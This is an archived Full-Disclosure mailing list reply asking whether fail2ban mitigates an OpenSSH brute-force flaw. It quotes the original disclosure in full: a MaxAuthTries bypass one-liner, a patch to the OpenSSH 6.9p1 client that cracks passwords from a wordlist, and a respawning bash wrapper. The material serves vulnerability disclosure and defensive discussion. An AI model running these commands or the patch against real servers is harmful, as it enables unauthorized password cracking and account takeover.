lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Sat, 18 Jul 2015 03:29:20 +0100
From: devel@...soft.ltd.uk
To: fulldisclosure@...lists.org
Subject: Re: [FD] OpenSSH keyboard-interactive authentication brute force
 vulnerability (MaxAuthTries bypass)

On 17/07/15 10:04, king cope wrote:
> OpenSSH has a default value of six authentication tries before it will
> close the connection (the ssh client allows only three password
> entries per default).
>
> With this vulnerability an attacker is able to request as many
> password prompts limited by the “login graced time” setting, that is
> set to two minutes by default.
>
> Especially FreeBSD systems are affected by the vulnerability because
> they have keyboard-interactive authentication enabled by default.
>
> A simple way to exploit the bug is to execute this command:
>
> ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x
> 10000'` targethost
>
> This will effectively allow up to 10000 password entries limited by
> the login grace time setting.
>
> The crucial part is that if the attacker requests 10000
> keyboard-interactive devices openssh will gracefully execute the
> request and will be inside a loop to accept passwords until the
> specified devices are exceeded.
>
> Here is a patch for openssh-6.9p1 that will allow to use a wordlist
> and any passwords piped to the ssh process to be used in order to
> crack passwords remotely.
>
> ---snip---
>
> diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c
>  83a84,85
>  > char password[1024];
>  >
>  510c512,517
>  < authctxt->success = 1; /* break out */
>  ---
>  > printf("==============================================\n");
>  > printf("*** SUCCESS **********************************\n");
>  > printf("*** PASSWORD: %s\n", password);
>  > printf("==============================================\n");
>  > exit(0);
>  >
>  1376a1384,1385
>  > char *devicebuffer;
>  > int i;
>  1386a1396,1405
>  > devicebuffer = calloc(1, 200000);
>  > if (!devicebuffer) {
>  > fatal("cannot allocate devicebuffer");
>  > }
>  >
>  > for (i=0;i<200000-2;i+=2) {
>  > memcpy(devicebuffer + i, "p,", 2);
>  > }
>  > devicebuffer[200000] = 0;
>  >
>  1393,1394c1412
>  < packet_put_cstring(options.kbd_interactive_devices ?
>  < options.kbd_interactive_devices : "");
>  ---
>  > packet_put_cstring(devicebuffer);
>  1408c1426
>  < char *name, *inst, *lang, *prompt, *response;
>  ---
>  > char *name, *inst, *lang, *prompt;
>  1410c1428
>  < int echo = 0;
>  ---
>  > char *pos;
>  1425a1444
>  >
>  1430a1450
>  >
>  1443,1449c1463,1469
>  < echo = packet_get_char();
>  <
>  < response = read_passphrase(prompt, echo ? RP_ECHO : 0);
>  <
>  < packet_put_cstring(response);
>  < explicit_bzero(response, strlen(response));
>  < free(response);
>  ---
>  > packet_get_char();
>  > if (fgets(password, 1024, stdin) == NULL)
>  > exit(0);
>  > if ((pos=strchr(password, '\n')) != NULL)
>  > *pos = '';
>  > printf("%s\n", password);
>  > packet_put_cstring(password);
>
> ---snip---
>
> After applying the patch you can use this shell script to make the
> password attack from a wordlist:
>
> ---snip---
>
> #!/bin/bash
> # run as:
> # cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target
> #
> while true
> do
> ./ssh -l$1 $2
> rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi
> echo Respawn due to login grace time...
> done
>
> ---snip---
>
> For example enter this command:
>
> cat wordlist.txt | ./sshcracker.sh test 192.168.2.173
>
> The attack has been tested against a new FreeBSD 10.1 system and older
> FreeBSD versions such as version 6.2.
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
Do you know if this is still affected if you have fail2ban in place.
Fail2ban uses the auth logs to monitor failed password attempts. I
assume that the auth log is still updated even if x number of attempts
is allowed. Thanks


-- 
==

Don Alexander

It's a tough job, but some mug has to do it...


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists